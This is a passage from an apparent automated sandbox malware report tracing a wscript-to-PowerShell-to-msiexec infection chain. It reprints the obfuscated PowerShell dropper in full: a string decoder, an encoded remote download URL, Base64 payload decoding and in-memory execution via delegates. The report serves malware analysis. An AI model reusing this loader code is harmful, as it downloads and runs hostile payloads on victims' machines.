dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL OmdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.Core.pdbFa source: powershell.exe, 00000006.00000002.1736763691.0000000008201000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("POWERSHELL " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneo", "0")
              Source: Yara matchFile source: 00000006.00000002.1750338876.000000000D2B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1739244674.00000000086B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.1549179646.0000026737431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1722477859.0000000005A48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nonelector)$GloBal:saNOPURUlenT = [sysTeM.TeXT.eNCodinG]::AScIi.GetSTrINg($sLynGLernE)$glObaL:HagIOscopE=$saNoPURULeNt.SUBstRIng($CHlorinIty144,$gLDesLs)<#Unbroken Sadistisk Rejselot
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Hucksterise42 $snoende $Catholicising), (Ophoejede @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Independentism = [AppDomain]::CurrentDomain.GetAssemblie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cetiosauria)), $Udregnendes).DefineDynamicModule($Unguilefulness, $false).DefineType($Brrups, $Phoh, [System.MulticastDelegate])$Sejlk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Nonelector)$GloBal:saNOPURUlenT = [sysTeM.TeXT.eNCodinG]::AScIi.GetSTrINg($sLynGLernE)$glObaL:HagIOscopE=$saNoPURULeNt.SUBstRIng($CHlorinIty144,$gLDesLs)<#Unbroken Sadistisk Rejselot
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. 